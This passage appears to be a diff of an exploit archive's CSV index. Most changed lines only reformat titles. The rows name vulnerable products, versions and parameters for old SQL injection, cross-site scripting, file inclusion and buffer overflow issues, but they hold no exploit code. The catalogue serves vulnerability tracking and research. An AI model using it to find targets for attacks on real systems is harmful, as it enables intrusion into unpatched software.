Vulnerability",2007-12-21,root@hanicker.it,php,webapps,0 30922,platforms/multiple/dos/30922.c,"WinUAE 1.4.4 'zfile.c' Stack-Based Buffer Overflow Vulnerability",2007-12-21,"Luigi Auriemma",multiple,dos,0 30923,platforms/php/webapps/30923.txt,"MyBlog 1.x Games.PHP ID Remote File Include Vulnerability",2007-12-22,"Beenu Arora",php,webapps,0 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x forum/viewthread.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 30925,platforms/php/webapps/30925.txt,"Dokeos 1.x forum/viewforum.php forum Parameter XSS",2007-12-22,Doz,php,webapps,0 30926,platforms/php/webapps/30926.txt,"Dokeos 1.x work/work.php display_upload_form Action origin Parameter XSS",2007-12-22,Doz,php,webapps,0 30927,platforms/php/webapps/30927.txt,"Agares Media ThemeSiteScript 1.0 'loadadminpage' Parameter Remote File Include Vulnerability",2007-12-24,Koller,php,webapps,0 -30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0 +30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0 30929,platforms/php/webapps/30929.txt,"Logaholic update.php page Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 30930,platforms/php/webapps/30930.txt,"Logaholic index.php parameter Parameter SQL Injection",2007-12-24,malibu.r,php,webapps,0 30931,platforms/php/webapps/30931.txt,"Logaholic index.php conf Parameter XSS",2007-12-24,malibu.r,php,webapps,0 @@ -27747,15 +27747,15 @@ id,file,description,date,author,platform,type,port 30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 Crafted ZPL File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0 30934,platforms/windows/dos/30934.txt,"Total Player 3.0 M3U File Denial of Service Vulnerability",2007-12-25,"David G.M.",windows,dos,0 30935,platforms/hardware/remote/30935.txt,"ZyXEL P-330W Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0 -30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 +30936,platforms/windows/dos/30936.html,"AOL Picture Editor 'YGPPicEdit.dll' ActiveX Control 9.5.1.8 - Multiple Buffer Overflow Vulnerabilities",2007-12-25,"Elazar Broad",windows,dos,0 30937,platforms/php/webapps/30937.txt,"Limbo CMS 1.0.4 'com_option' Parameter Cross-Site Scripting Vulnerability",2007-12-25,"Omer Singer",php,webapps,0 30938,platforms/asp/webapps/30938.txt,"Web Sihirbazi 5.1.1 'default.asp' Multiple SQL Injection Vulnerabilities",2007-12-24,bypass,asp,webapps,0 30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 Error Message Remote Script Execution Vulnerability",2007-12-26,anonymous,windows,remote,0 30940,platforms/asp/webapps/30940.txt,"IPortalX forum/login_user.asp Multiple Parameter XSS",2007-12-27,Doz,asp,webapps,0 30941,platforms/asp/webapps/30941.txt,"IPortalX blogs.asp Date Parameter XSS",2007-12-27,Doz,asp,webapps,0 30942,platforms/linux/dos/30942.c,"Extended Module Player (xmp) 2.5.1 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",linux,dos,0 -30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0 -30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 Multiple Remote Buffer Overflow and Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0 +30943,platforms/multiple/dos/30943.txt,"Libnemesi 0.6.4-rc1 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,dos,0 +30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow and Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0 30945,platforms/php/webapps/30945.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' Cross-Site Scripting Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0 30946,platforms/php/webapps/30946.txt,"Collabtive 1.1 (managetimetracker.php, id param) - SQL Injection",2014-01-15,"Yogesh Phadtare",php,webapps,80 30947,platforms/php/webapps/30947.txt,"NetBizCity FaqMasterFlexPlus 'faq.php' SQL Injection Vulnerability",2007-12-28,"Juan Galiana Lara",php,webapps,0 @@ -27781,8 +27781,8 @@ id,file,description,date,author,platform,type,port 30967,platforms/php/webapps/30967.txt,"LiveCart 1.0.1 user/remindComplete email Parameter XSS",2007-12-31,Doz,php,webapps,0 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 -30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 -30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0 +30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 +30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0 30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service Vulnerability",2008-01-02,greyvoip,multiple,dos,0 @@ -27791,7 +27791,7 @@ id,file,description,date,author,platform,type,port 30977,platforms/php/webapps/30977.txt,"WordPress <= 2.2.3 - wp-admin/post.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30978,platforms/php/webapps/30978.txt,"WordPress <= 2.2.3 wp-admin/page-new.php popuptitle Parameter XSS",2008-01-03,3APA3A,php,webapps,0 30979,platforms/php/webapps/30979.txt,"WordPress <= 2.2.3 wp-admin/edit.php backup Parameter XSS",2008-01-03,3APA3A,php,webapps,0 -30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 +30980,platforms/php/webapps/30980.txt,"AwesomeTemplateEngine 1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30981,platforms/php/webapps/30981.txt,"PRO-Search 0.17 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 30982,platforms/php/webapps/30982.html,"Nucleus CMS 3.0.1 'myid' Parameter SQL Injection Weakness",2008-01-03,MustLive,php,webapps,0 30983,platforms/php/webapps/30983.txt,"ExpressionEngine 1.2.1 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2008-01-03,MustLive,php,webapps,0 @@ -27803,7 +27803,7 @@ id,file,description,date,author,platform,type,port 30990,platforms/multiple/dos/30990.txt,"Foxit WAC Server 2.0 Build 3503 Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0 30991,platforms/multiple/dos/30991.txt,"Pragma TelnetServer 7.0.4.589 NULL-Pointer Dereference Denial of Service Vulnerability",2008-01-04,"Luigi Auriemma",multiple,dos,0 30992,platforms/php/webapps/30992.txt,"Strawberry 1.1.1 'html.php' Remote Code Execution Vulnerability",2008-01-07,"Eugene Minaev",php,webapps,0 -30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 +30993,platforms/asp/webapps/30993.txt,"Snitz Forums 2000 3.4.5/3.4.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-07,Doz,asp,webapps,0 30994,platforms/php/webapps/30994.html,"eTicket 1.5.5.2 admin.php CSRF",2008-01-07,L4teral,php,webapps,0 30995,platforms/php/webapps/30995.txt,"eTicket 1.5.5.2 view.php s Parameter XSS",2008-01-07,L4teral,php,webapps,0 30996,platforms/php/webapps/30996.txt,"eTicket 1.5.5.2 search.php Multiple Parameter SQL Injection",2008-01-07,L4teral,php,webapps,0 @@ -27818,7 +27818,7 @@ id,file,description,date,author,platform,type,port 31005,platforms/jsp/webapps/31005.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/account/findForSelect.jsp resultsForm Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31006,platforms/jsp/webapps/31006.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/help/index.jsp helpUrl Variable Remote Frame Injection",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 31007,platforms/jsp/webapps/31007.txt,"Sun Java System Identity Manager 6.0/7.0/7.1 /idm/user/main.jsp activeControl Parameter XSS",2008-01-09,"Jan Fry and Adrian Pastor",jsp,webapps,0 -31008,platforms/php/webapps/31008.txt,"Joomla-SMF Forum 1.1.4 Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 +31008,platforms/php/webapps/31008.txt,"Joomla-SMF Forum 1.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-09,Doz,php,webapps,0 31009,platforms/php/webapps/31009.txt,"ID-Commerce 2.0 'liste.php' SQL Injection Vulnerability",2008-01-10,consultant.securite,php,webapps,0 31010,platforms/multiple/remote/31010.sql,"Oracle Database 10 g XML DB XDB.XDB_PITRIG_PKG Package PITRIG_TRUNCATE Function Overflow",2008-01-10,sh2kerr,multiple,remote,0 31011,platforms/php/webapps/31011.txt,"Members Area System 1.7 'view_func.php' Remote File Include Vulnerability",2008-01-11,ShipNX,php,webapps,0 @@ -27826,7 +27826,7 @@ id,file,description,date,author,platform,type,port 31014,platforms/windows/dos/31014.py,"haneWIN DNS Server 1.5.3 - Denial of Service",2014-01-17,sajith,windows,dos,53 31015,platforms/php/webapps/31015.txt,"bloofox CMS 0.5.0 - Multiple Vulnerabilities",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,80 31017,platforms/asp/webapps/31017.php,"SmarterMail Enterprise and Standard <=11.x - Stored XSS",2014-01-17,"Saeed reza Zamanian",asp,webapps,80 -31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0 +31018,platforms/linux/dos/31018.txt,"GStreamer 0.10.15 - Multiple Unspecified Remote Denial of Service Vulnerabilities",2008-01-11,"Sam Hocevar",linux,dos,0 31020,platforms/php/webapps/31020.txt,"Moodle <= 1.8.3 'install.php' Cross Site Scripting Vulnerability",2008-01-12,"Hanno Bock",php,webapps,0 31021,platforms/osx/dos/31021.html,"Apple Safari <= 2.0.4 KHTML WebKit Remote Denial of Service Vulnerability",2008-01-12,"David Barroso",osx,dos,0 31022,platforms/php/webapps/31022.txt,"PHP Running Management 1.0.2 'index.php' Cross Site Scripting Vulnerability",2008-01-13,"Christophe VG",php,webapps,0 @@ -27834,7 +27834,7 @@ id,file,description,date,author,platform,type,port 31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0 31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate CRLF Characters URL Filtering Bypass Vulnerability",2008-01-14,Danux,hardware,remote,0 -31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 +31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 31028,platforms/php/webapps/31028.txt,"Article Dashboard 'admin/login.php' Multiple SQL Injection Vulnerabilities",2008-01-15,Xcross87,php,webapps,0 31029,platforms/php/webapps/31029.pl,"Peter's Math Anti-Spam for WordPress 0.1.6 Plugin Audio CAPTCHA Security Bypass Vulnerability",2008-01-15,Romero,php,webapps,0 31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0 @@ -27842,13 +27842,13 @@ id,file,description,date,author,platform,type,port 31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 and uTorrent 1.6/1.7 Peers Window Remote Code Execution Vulnerability",2008-01-16,"Luigi Auriemma",windows,remote,0 31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80 31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0 -31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 +31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0 31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability",2008-01-19,"Oliver Karow",windows,remote,0 31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.DLL' 1.0 ActiveX Control Buffer Overflow Vulnerabilities",2008-01-20,rgod,windows,remote,0 -31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0 +31041,platforms/php/webapps/31041.txt,"bloofoxCMS 0.3 - Multiple Input Validation Vulnerabilities",2008-01-20,"AmnPardaz ",php,webapps,0 31042,platforms/asp/webapps/31042.txt,"MegaBBS 1.5.14b 'upload.asp' Cross-Site Scripting Vulnerability",2008-01-21,Doz,asp,webapps,0 31043,platforms/cgi/webapps/31043.txt,"Alice Gate2 Plus Wi-Fi Router Cross-Site Request Forgery Vulnerability",2008-01-21,WarGame,cgi,webapps,0 31044,platforms/php/webapps/31044.txt,"singapore 0.10.1 Modern Template 'gallery' Parameter Cross-Site Scripting Vulnerability",2008-01-21,trew,php,webapps,0 @@ -27874,7 +27874,7 @@ id,file,description,date,author,platform,type,port 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 'report_type' Cross-Site Scripting Vulnerability",2008-01-26,nnposter,php,webapps,0 31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module - 'connector.php' Cross-Site Scripting Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0 -31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 'install.php' Local File Include Vulnerability",2008-01-28,p4imi0,php,webapps,0 +31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Include Vulnerability",2008-01-28,p4imi0,php,webapps,0 31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 'index.php' Cross-Site Scripting Vulnerability",2008-01-28,jekil,php,webapps,0 31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page SQL Injection Vulnerability",2008-01-28,T_L_O_T_D,asp,webapps,0 @@ -27906,7 +27906,7 @@ id,file,description,date,author,platform,type,port 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 'search.php' Cross-Site Scripting Vulnerability",2008-02-04,Psiczn,php,webapps,0 31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection Vulnerability",2008-02-04,Psiczn,php,webapps,0 -31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 Remote Authentication Buffer Overflow Vulnerability",2008-02-04,L4teral,multiple,dos,0 +31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow Vulnerability",2008-02-04,L4teral,multiple,dos,0 31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone 'load_message.php' Cross-Site Scripting Vulnerability",2008-02-04,Smasher,php,webapps,0 31102,platforms/hardware/dos/31102.c,"MikroTik RouterOS 3.0 SNMP SET Denial of Service Vulnerability",2008-02-04,ShadOS,hardware,dos,0 31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk operator/article/article_search_results.asp txtSearch Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0 @@ -27918,17 +27918,17 @@ id,file,description,date,author,platform,type,port 31109,platforms/php/webapps/31109.txt,"Portail Web Php 2.5.1 modules/conf_modules.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31110,platforms/php/webapps/31110.txt,"Portail Web Php 2.5.1 system/login.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31111,platforms/php/webapps/31111.txt,"Download Management 1.00 for PHP-Fusion Multiple Local File Include Vulnerabilities",2008-02-05,Psiczn,php,webapps,0 -31112,platforms/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps,0 +31112,platforms/php/webapps/31112.txt,"DevTracker Module For bcoos 1.1.11 and E-xoops 1.0.8 - Multiple Cross-Site Scripting Vulnerabilities",2008-02-04,Lostmon,php,webapps,0 31113,platforms/windows/remote/31113.html,"GlobalLink 2.6.1.2 'HanGamePlugincn18.dll' ActiveX Control Multiple Buffer Overflow Vulnerabilities",2008-02-05,anonymous,windows,remote,0 -31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader <= 8.1.1 Multiple Arbitrary Code Execution and Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 -31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x 'hash' Parameter Cross Site Scripting Vulnerability",2008-02-06,SkyOut,php,webapps,0 +31114,platforms/windows/dos/31114.txt,"Adobe Acrobat and Reader <= 8.1.1 - Multiple Arbitrary Code Execution and Security Vulnerabilities",2008-02-06,"Paul Craig",windows,dos,0 +31115,platforms/php/webapps/31115.txt,"MyNews 1.6.x - 'hash' Parameter Cross Site Scripting Vulnerability",2008-02-06,SkyOut,php,webapps,0 31116,platforms/php/webapps/31116.txt,"Pagetool 1.07 'search_term' Parameter Cross-Site Scripting Vulnerability",2008-02-06,Phanter-Root,php,webapps,0 31117,platforms/asp/webapps/31117.txt,"WS_FTP Server 6 /WSFTPSVR/FTPLogServer/LogViewer.asp Authentication Bypass",2008-02-06,"Luigi Auriemma",asp,webapps,0 31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability",2008-02-06,"Luigi Auriemma",windows,remote,0 31119,platforms/multiple/remote/31119.txt,"TinTin++ and WinTin++ 1.97.9 - '#chat' Command Multiple Security Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0 31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0 31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component - 'gid' Parameter SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0 -31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 +31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 'subpage' Parameter Multiple Local File Include Vulnerabilities",2008-02-08,"Alexandr Polyakov",php,webapps,0 31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 'id' Parameter Cross Site Scripting Vulnerability",2008-02-08,Psiczn,php,webapps,0 31125,platforms/php/webapps/31125.txt,"Joovili 2.1 'members_help.php' Remote File Include Vulnerability",2008-02-08,Cr@zy_King,php,webapps,0 @@ -27938,7 +27938,7 @@ id,file,description,date,author,platform,type,port 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x Installation Information Disclosure Vulnerability",2008-02-08,"Brook Powers",php,webapps,0 31130,platforms/multiple/remote/31130.txt,"Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability",2008-02-09,"John Kew",multiple,remote,0 31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 'index.php' SQL Injection and Cross-Site Scripting Vulnerabilities",2008-02-09,Houssamix,php,webapps,0 -31132,platforms/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote,0 +31132,platforms/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 - Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote,0 31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery Vulnerability",2008-02-11,nnposter,hardware,remote,0 31134,platforms/php/webapps/31134.txt,"VWar 1.5 'calendar.php' SQL Injection Vulnerability",2008-02-11,Pouya_Server,php,webapps,0 31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component Multiple SQL Injection Vulnerabilities",2008-02-11,breaker_unit,php,webapps,0 @@ -27999,19 +27999,19 @@ id,file,description,date,author,platform,type,port 31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha 'index.php' Local File Include Vulnerability",2008-02-14,muuratsalo,php,webapps,0 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service Vulnerability",2008-02-15,"Carl Hardwick",multiple,dos,0 31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0 -31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 +31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 31206,platforms/php/webapps/31206.txt,"Joomla! and Mambo 'com_smslist' Component - 'listid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31207,platforms/php/webapps/31207.txt,"Joomla! and Mambo 'com_activities' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31208,platforms/php/webapps/31208.txt,"Joomla! and Mambo 'com_sg' Component - 'pid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31209,platforms/php/webapps/31209.txt,"Joomla! and Mambo faq Component - 'catid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11'topic' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 'index.php' SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 -31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x 'topic' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 +31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31213,platforms/php/webapps/31213.txt,"Joomla! and Mambo 'com_salesrep' Component - 'rid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31214,platforms/php/webapps/31214.txt,"Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 31215,platforms/php/webapps/31215.txt,"Joomla! and Mambo com_filebase Component - 'filecatid' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 31216,platforms/php/webapps/31216.txt,"Joomla! and Mambo com_scheduling Component - 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 -31217,platforms/php/webapps/31217.txt,"BanPro DMS 1.0 'index.php' Local File Include Vulnerability",2008-02-16,muuratsalo,php,webapps,0 +31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 'index.php' Local File Include Vulnerability",2008-02-16,muuratsalo,php,webapps,0 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service Vulnerability",2008-02-17,"Luigi Auriemma",linux,dos,0 31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Password Reset CSRF from Stored XSS (Web UI)",2014-01-27,"David Um",windows,webapps,0 @@ -28020,9 +28020,9 @@ id,file,description,date,author,platform,type,port 31224,platforms/php/webapps/31224.txt,"Joomla! and Mambo com_profile Component - 'oid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 'admin.php' Cross-Site Scripting Vulnerability",2008-02-18,NBBN,php,webapps,0 31226,platforms/php/webapps/31226.txt,"Joomla! and Mambo com_detail Component - 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 -31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x 'sf-profile.php' SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 +31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 31228,platforms/php/webapps/31228.txt,"WordPress Recipes Blog Plugin 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 -31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 +31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 'wp-people-popup.php' SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 Directory Traversal Vulnerability",2008-02-19,"Luigi Auriemma",windows,remote,0 31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow Vulnerability",2008-02-16,"Luigi Auriemma",multiple,dos,0 @@ -28035,7 +28035,7 @@ id,file,description,date,author,platform,type,port 31239,platforms/php/webapps/31239.txt,"Google Hack Honeypot File Upload Manager 1.3 'delall' Unauthorized File Access Vulnerability",2008-02-19,Mr-m07,php,webapps,0 31240,platforms/php/webapps/31240.txt,"SmarterTools SmarterMail 4.3 Subject Field HTML Injection Vulnerability",2008-02-19,"Juan Pablo Lopez Yacubian",php,webapps,0 31241,platforms/php/webapps/31241.txt,"PHP-Nuke Sections Module - 'artid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31242,platforms/php/webapps/31242.txt,"Facile Forms 1.x 'catid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31242,platforms/php/webapps/31242.txt,"Facile Forms 1.x - 'catid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31243,platforms/php/webapps/31243.txt,"Joomla! and Mambo 'com_team' 